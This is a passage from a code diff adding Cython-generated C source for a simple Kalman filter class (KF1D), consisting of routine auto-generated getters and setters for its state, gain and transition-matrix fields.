self.x1_0 = x[1][0] + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_x, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 36, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_GetItemInt(__pyx_t_1, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 36, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_3 = __pyx_PyFloat_AsDouble(__pyx_t_2); if (unlikely((__pyx_t_3 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 36, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_v_self->x0_0 = __pyx_t_3; + + /* "common/kalman/simple_kalman_impl.pyx":37 + * def x(self, x): + * self.x0_0 = x[0][0] + * self.x1_0 = x[1][0] # <<<<<<<<<<<<<< + */ + __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_x, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 37, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_1 = __Pyx_GetItemInt(__pyx_t_2, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 37, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_3 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_3 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 37, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_self->x1_0 = __pyx_t_3; + + /* "common/kalman/simple_kalman_impl.pyx":34 + * return [[self.x0_0], [self.x1_0]] + * + * @x.setter # <<<<<<<<<<<<<< + * def x(self, x): + * self.x0_0 = x[0][0] + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.x.__set__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/kalman/simple_kalman_impl.pxd":5 + * cdef class KF1D: + * cdef public: + * double x0_0 # <<<<<<<<<<<<<< + * double x1_0 + * double K0_0 + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4x0_0_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4x0_0_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4x0_0___get__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4x0_0___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_self->x0_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.x0_0.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* Python wrapper */ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4x0_0_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4x0_0_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__set__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4x0_0_2__set__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4x0_0_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + double __pyx_t_1; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__set__", 0); + __pyx_t_1 = __pyx_PyFloat_AsDouble(__pyx_v_value); if (unlikely((__pyx_t_1 == (double)-1) && PyErr_Occurred())) __PYX_ERR(1, 5, __pyx_L1_error) + __pyx_v_self->x0_0 = __pyx_t_1; + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.x0_0.__set__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/kalman/simple_kalman_impl.pxd":6 + * cdef public: + * double x0_0 + * double x1_0 # <<<<<<<<<<<<<< + * double K0_0 + * double K1_0 + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4x1_0_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4x1_0_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4x1_0___get__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4x1_0___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_self->x1_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.x1_0.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* Python wrapper */ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4x1_0_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4x1_0_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__set__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4x1_0_2__set__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4x1_0_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + double __pyx_t_1; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__set__", 0); + __pyx_t_1 = __pyx_PyFloat_AsDouble(__pyx_v_value); if (unlikely((__pyx_t_1 == (double)-1) && PyErr_Occurred())) __PYX_ERR(1, 6, __pyx_L1_error) + __pyx_v_self->x1_0 = __pyx_t_1; + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.x1_0.__set__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/kalman/simple_kalman_impl.pxd":7 + * double x0_0 + * double x1_0 + * double K0_0 # <<<<<<<<<<<<<< + * double K1_0 + * double A0_0 + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4K0_0_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4K0_0_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4K0_0___get__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4K0_0___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_self->K0_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 7, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.K0_0.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* Python wrapper */ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4K0_0_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4K0_0_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__set__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4K0_0_2__set__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4K0_0_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + double __pyx_t_1; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__set__", 0); + __pyx_t_1 = __pyx_PyFloat_AsDouble(__pyx_v_value); if (unlikely((__pyx_t_1 == (double)-1) && PyErr_Occurred())) __PYX_ERR(1, 7, __pyx_L1_error) + __pyx_v_self->K0_0 = __pyx_t_1; + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.K0_0.__set__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/kalman/simple_kalman_impl.pxd":8 + * double x1_0 + * double K0_0 + * double K1_0 # <<<<<<<<<<<<<< + * double A0_0 + * double A0_1 + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4K1_0_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4K1_0_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4K1_0___get__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4K1_0___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_self->K1_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 8, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.K1_0.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* Python wrapper */ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4K1_0_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4K1_0_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__set__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4K1_0_2__set__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4K1_0_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + double __pyx_t_1; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__set__", 0); + __pyx_t_1 = __pyx_PyFloat_AsDouble(__pyx_v_value); if (unlikely((__pyx_t_1 == (double)-1) && PyErr_Occurred())) __PYX_ERR(1, 8, __pyx_L1_error) + __pyx_v_self->K1_0 = __pyx_t_1; + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.K1_0.__set__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/kalman/simple_kalman_impl.pxd":9 + * double K0_0 + * double K1_0 + * double A0_0 # <<<<<<<<<<<<<< + * double A0_1 + * double A1_0 + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_0_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_0_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_0___get__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_0___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_self->A0_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 9, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.A0_0.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* Python wrapper */ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_0_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_0_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__set__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_0_2__set__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_0_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + double __pyx_t_1; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__set__", 0); + __pyx_t_1 = __pyx_PyFloat_AsDouble(__pyx_v_value); if (unlikely((__pyx_t_1 == (double)-1) && PyErr_Occurred())) __PYX_ERR(1, 9, __pyx_L1_error) + __pyx_v_self->A0_0 = __pyx_t_1; + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.A0_0.__set__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/kalman/simple_kalman_impl.pxd":10 + * double K1_0 + * double A0_0 + * double A0_1 # <<<<<<<<<<<<<< + * double A1_0 + * double A1_1 + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_1_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_1_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_1___get__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_1___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_self->A0_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 10, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.A0_1.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* Python wrapper */ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_1_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_1_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__set__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_1_2__set__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_1_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + double __pyx_t_1; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__set__", 0); + __pyx_t_1 = __pyx_PyFloat_AsDouble(__pyx_v_value); if (unlikely((__pyx_t_1 == (double)-1) && PyErr_Occurred())) __PYX_ERR(1, 10, __pyx_L1_error) + __pyx_v_self->A0_1 = __pyx_t_1; + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.A0_1.__set__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/kalman/simple_kalman_impl.pxd":11 + * double A0_0 + * double A0_1 + * double A1_0 # <<<<<<<<<<<<<< + * double A1_1 + * double C0_0 + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_0_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_0_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_0___get__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_0___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_self->A1_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 11, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.A1_0.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* Python wrapper */ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_0_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_0_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__set__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_0_2__set__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A1_0_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + double __pyx_t_1; 